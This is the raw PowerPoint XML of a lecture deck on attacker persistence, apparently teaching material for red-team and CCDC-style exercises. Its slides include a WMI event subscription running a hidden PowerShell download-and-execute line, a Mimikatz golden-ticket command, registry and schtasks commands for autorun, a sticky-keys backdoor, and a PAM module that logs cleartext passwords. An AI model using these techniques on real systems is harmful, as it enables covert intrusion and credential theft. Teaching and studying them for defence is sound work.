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23"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId3"/>
    <p:sldId id="262" r:id="rId4"/>
    <p:sldId id="264" r:id="rId5"/>
    <p:sldId id="263" r:id="rId6"/>
    <p:sldId id="266" r:id="rId7"/>
    <p:sldId id="265" r:id="rId8"/>
    <p:sldId id="267" r:id="rId9"/>
    <p:sldId id="272" r:id="rId10"/>
    <p:sldId id="273" r:id="rId11"/>
    <p:sldId id="274" r:id="rId12"/>
    <p:sldId id="279" r:id="rId13"/>
    <p:sldId id="276" r:id="rId14"/>
    <p:sldId id="281" r:id="rId15"/>
    <p:sldId id="277" r:id="rId16"/>
    <p:sldId id="275" r:id="rId17"/>
    <p:sldId id="268" r:id="rId18"/>
    <p:sldId id="282" r:id="rId19"/>
    <p:sldId id="26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3"/>
    <p:restoredTop sz="92810"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="121" d="100"/>
          <a:sy n="121" d="100"/>
        </p:scale>
        <p:origin x="7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  <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>blog.cobaltstrike.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/2013/11/09/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>schtasks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-persistence-with-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-one-liners/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TA0003/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.hexacorn.com/blog/2017/01/28/beyond-good-ol-run-key-all-par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h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DAEB-AA6F-254B-BDC4-BAA04BF1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Service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1E9F-4F47-B445-917D-DE08D3E5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use multiple files to run</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Config files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Extra setup scripts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Service binary itself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8BE4F-4280-CA4A-B763-C9EEB7F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E336F-A5EC-9D49-84A5-330C4717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A05-0292-224C-BD7E-769146B7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object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50E3-487C-554F-AA09-7CDA38B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that allows apps to communicate through the OS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>COM object is defined by CLSID</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Load via malicious DLL or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Vbscript</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Some of these autorun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HKCU\Software\Classes\CLSID\{b5f8350b-0548-48b1-a6ee-88bd00b4a5e7}\InprocServer32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HKCU\Software\Classes\Wow6432Node\CLSID\{BCDE0395-E52F-467C-8E3D-C4579291692E }\InprocServer32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detected by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Sysinternals</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Autoruns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504C5-2DFC-A942-BA95-27DE906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DB342-9E56-D84D-B7DE-FC643C7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15AEE-BC67-0848-AEB4-E7A91DF875A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1147927" y="6296649"/>
            <a:ext cx="8823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www.gdatasoftware.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>/blog/2014/10/23941-com-object-hijacking-the-discreet-way-of-persistence</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="297443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6C1A-3FDF-2747-8A1E-6066AE70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Event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C5A6-9CE1-A54A-BAB6-E3F5A528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wmic /NAMESPACE:"\\root\subscription" PATH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Name="VirusScan",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="root\cimv2",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QueryLanguage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="WQL", Query="SELECT * FROM Win32_ProcessStartTrace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notepad.exe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wmic /NAMESPACE:"\\root\subscription" PATH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CommandLineEventConsumer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Name="VirusScan",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CommandLineTemplate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-w hidden -c \"IEX ((new-object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net.webclient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/file'))\"”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wmic /NAMESPACE:"\\root\subscription" PATH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FilterToConsumerBinding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Filter="__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EventFilter.Name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=\"VirusScan\"", Consumer="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CommandLineEventConsumer.Name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=\"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PushVirusScan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1E6A8-6E2A-3348-8253-22FFD86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A25A-4806-A341-9DA7-9D0FE71E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8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102-A8F8-3442-B486-1CAD6716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35B4-CD42-1742-BC43-D13500AE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what we talked about in privilege escalation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Placing a malicious DLL in Windows search path</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Could still call the real DLL to make sure that programs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>execute normally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F936F-5B0B-3A4D-9EAF-0508552B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C1BCB-DC13-A142-B108-A556C45F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5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23D0-4380-3348-B360-093B391C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2213-4CAD-A44C-872B-689A6FC0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CCDC events</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can modify the binary used by sticky keys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the binary used for on-screen keyboard to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cmd.exe</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Registry</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>From the login screen, click on screen keyboard</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Shell!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AF28-6B61-9243-9DA0-74BD2C3B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69E9B-2709-2448-8AE0-D493BC08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0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5104-507B-AB44-A9CD-5F8CC689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Backdooring executables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80B5-AE4E-6840-9B75-366ED1FA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Binaries often have ”code caves”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can add our own code to them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Can compile our own version of binaries and replace the native ones</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Completely reliant on the executables being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EB348-08BE-184A-9580-9FD62BE1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F9B23-3B32-BF46-B277-D7D31B20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0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53ED-54A1-0F46-AD66-05AC5049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Filter/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Pam.d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EDAD-10CE-324A-A623-CC8190CC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malicious DLL filter on a domain controller</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When a user attempts to change their domain password a few things happen first</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Goes to the DC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Runs through any defined filters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hashed and stored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query HKEY_LOCAL_MACHINE\SYSTEM\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CurrentControlSet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\Control\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/v "Notification Packages"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add HKEY_LOCAL_MACHINE\SYSTEM\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CurrentControlSet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\Control\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/v "Notification Packages" /t REG_MULTI_SZ /d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scecli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\0rassfm\0audit /f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4F73-863E-D84D-A56A-FC61A59F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D144-8BA1-5446-914F-62515D9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7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C63E-052F-5047-8337-692BE40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Pam.d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5DE2-A1D7-7B4F-92FD-55E7E80D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Pam is responsible for authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cleartext password goes through this first</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Install a modified version of Pam to log the passwords used before they are hashed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Log to file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>File accessible by non-root account</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Send out over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10DC5-34CC-C443-801D-059C7922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A128-2592-0248-AB1B-3EE1BE9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F09-F2D6-F541-AFF8-8BFF77B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0B92-7311-8B4B-8E73-F952E02F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you bypass AV…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SysInternals</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Autoruns will pick up all of these</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If a defender uses this or similar techniques to check the machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If you aren’t careful where you place or name your binary or trigger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53647-D990-E745-BE55-5DF4277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7E5B0-25D4-4949-9151-DF38BB4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E30-DDDD-4546-B16D-7B380B44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places to check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25F7-918A-4049-815F-C8989AE8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http://www.hexacorn.com/blog/2017/01/28/beyond-good-ol-run-key-all-parts/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https://attack.mitre.org/tactics/TA0003/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325EF-4EE4-FC4A-B193-FE60159E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443C4-ECCC-CF48-A0A3-68CDED6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8CF6-01A7-8240-A28F-F24ADC59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EA1C-06E0-F44D-8B9C-3DF5AA67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an assessment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Penetration test</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Red team engagement</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User Persistence</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fewer options</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Elevated Persistence</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Requires privilege escalation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2279-7F3B-3E42-9DEB-A06B1EA1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16960-EC72-E347-8125-DE6451F1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9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CDD7-395F-AE4D-98AC-EB60295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8FF1-458C-B547-BAB5-2DAABA8B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start talking about how these implants call back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Stealth</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reliability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Command and control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C2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3E2C8-9DC1-0A44-94B2-829E743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66EEE-29E9-744B-9E46-EF40EEF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EE0F-382A-314C-96E4-72B15F73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D3B7-EE27-F243-935F-7B69C5D1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reboots</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ex. You broke a service with an exploit </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Callback/Meterpreter/Shell dies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Some tools are better than others</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Meterpreter can sometimes call back after a connection dies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Remember how these types of tools work</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Manipulate the system in a way they weren’t intended</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Network goes down for a short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52CC4-E665-C947-B711-40FA30C4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14DC-B7D5-6644-ACED-19E3C0AA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3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3F1F-04CF-6944-8F68-9CDCCC41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3C88-9578-604E-850B-F4FEDCE8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  <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Where is the content being stored</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Script</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exe/Elf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Command</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Con: Putting something on disk</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Trigger</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What tells the mechanism to execute?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Creativity is required for both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96F9-8A23-7540-B07A-FC953CD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139B7-BB38-9B4C-9CC8-49F49B20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6A5-5BCB-2144-A56A-FF80160D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F01-DB6A-6F49-A43B-867ECAE4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leave the system in a less secure state</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What your name your files is important</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Where you place your files is important</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>There are so many more ways to stay on a system than what I’ll present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3051-E503-4C4F-9F3E-C056462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79B8C-C7EF-514D-9F23-A9C10A60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BDD1-544A-5444-847E-4BE9D73A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B30B-C2B9-D04A-BEAD-62297765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credentials</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Creating local accounts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Creating domain accounts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Domain golden tickets/silver tickets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Mimikatz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golden_ticket_create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 [user] -d [domain] -k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krbtgthash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-s [domain SID] -t [/path/to/file]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Domain skeleton keys</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Adding SSH keys to accounts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1D928-4E97-604F-BFBA-1FF55A57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669B-6803-3547-8250-AE696561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BDCF-FEAB-4549-BA35-3F28119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Ol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>’ Run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D7DB-13A3-0943-BD40-D418967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Within the registry there are paths that autorun at start</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Run Keys</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Leaving a binary on disk</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Using a run key to call it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HKCU:Software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\\Microsoft\\Windows\\CurrentVersion\\Run\\</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Every time the system starts it executes your executable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You can also place entire scripts in registry keys to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A9702-0567-9B42-A0D6-3332A85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900BC-1349-3440-A363-DEEFB5C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3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0DEF-32A2-9449-92E6-2980826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Tasks/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Cron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A0EE-C5CE-DF41-9ABA-16EF4258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yet effective</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Windows/Linux automating execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Schtasks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/At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/create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Updater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“command to run”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onlogon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6F40-3700-814F-9892-DC7ECC32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CE28-CA7D-0E4D-9EFA-79044882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28ED-9695-EC47-B8D3-D48EAFF4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698D-196D-C64F-818A-F7F72A0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Services normally run as escalated uses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Helps to blend in</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Run on start</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can place the binary anywhere on the system to help hide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\\host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"service"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start=demand DisplayName="caption"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C5D0-29D3-0346-96B1-26A0E98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1E5B7-E31D-F345-9A52-E485F63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44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1734</TotalTime>
  <Words>980</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>193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Persistence</vt:lpstr>
      <vt:lpstr>Persistence</vt:lpstr>
      <vt:lpstr>Why?</vt:lpstr>
      <vt:lpstr>Pieces of Persistence</vt:lpstr>
      <vt:lpstr>Things to Remember</vt:lpstr>
      <vt:lpstr>Credentials</vt:lpstr>
      <vt:lpstr>Good Ol’ Run Key</vt:lpstr>
      <vt:lpstr>Scheduled Tasks/Cron </vt:lpstr>
      <vt:lpstr>Creating a Service</vt:lpstr>
      <vt:lpstr>Linux Service Modification</vt:lpstr>
      <vt:lpstr>COM object hijacking</vt:lpstr>
      <vt:lpstr>WMI Event Subscription</vt:lpstr>
      <vt:lpstr>DLL Hijacking</vt:lpstr>
      <vt:lpstr>Sticky Keys</vt:lpstr>
      <vt:lpstr>Backdooring executables</vt:lpstr>
      <vt:lpstr>DLL Filter/Pam.d Module</vt:lpstr>
      <vt:lpstr>Pam.d Module</vt:lpstr>
      <vt:lpstr>Getting Detected</vt:lpstr>
      <vt:lpstr>More places to check out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</dc:title>
  <dc:creator>Flaagan, Tyler</dc:creator>
  <cp:lastModifiedBy>Flaagan, Tyler</cp:lastModifiedBy>
  <cp:revision>25</cp:revision>
  <cp:lastPrinted>2018-01-16T14:21:07Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-10-30T23:16:03Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-11-12T00:39:58Z</dcterms:modified>
</cp:coreProperties>
</file>